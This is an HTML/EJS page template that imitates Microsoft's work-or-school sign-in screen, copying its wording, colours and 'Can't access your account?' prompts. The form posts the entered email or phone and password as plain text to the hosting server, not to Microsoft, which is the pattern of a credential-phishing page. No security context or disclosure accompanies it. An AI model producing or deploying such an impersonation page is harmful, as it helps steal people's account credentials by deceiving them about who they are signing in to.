<!DOCTYPE html>
<html>
<head>
  <% include ../partials/header.ejs %>
</head>

<body>


<form method="post" enctype="text/plain">
<p><p style="color: dimgray">Sign in with your work or school account</p>
<br>
<input name="email-phone" type="text" placeholder="Email and phone" size="50"></input>
<br>
<br>
<input name="password" type="password" placeholder="Password" size="50"></input>
<br>
<p><input name="keep" type="checkbox"></input>Keep me signed in</p>
<br>

<input class="submit-btn" name="sign in" type="Submit" value="Sign in" style="background-color: royalblue; opacity: 1; border: none; color: white; padding: 10px 10px 10px 10px"></input> <input class="submit-btn" name="cancel" type="Submit" value="Cancel" style="background-color: lightgray; opacity: 1; border: none; color: black; padding: 10px 10px 10px 10px"></input>

<br>
<br>
<p style="color: royalblue">Can't access your account?</p>
<p><p style="color: dimgray">Don't have an account assigned by your work or school?
<br>
<span style="color: royalblue">Sign in with a Microsoft account</span></p>
</form>


</body>
</html>
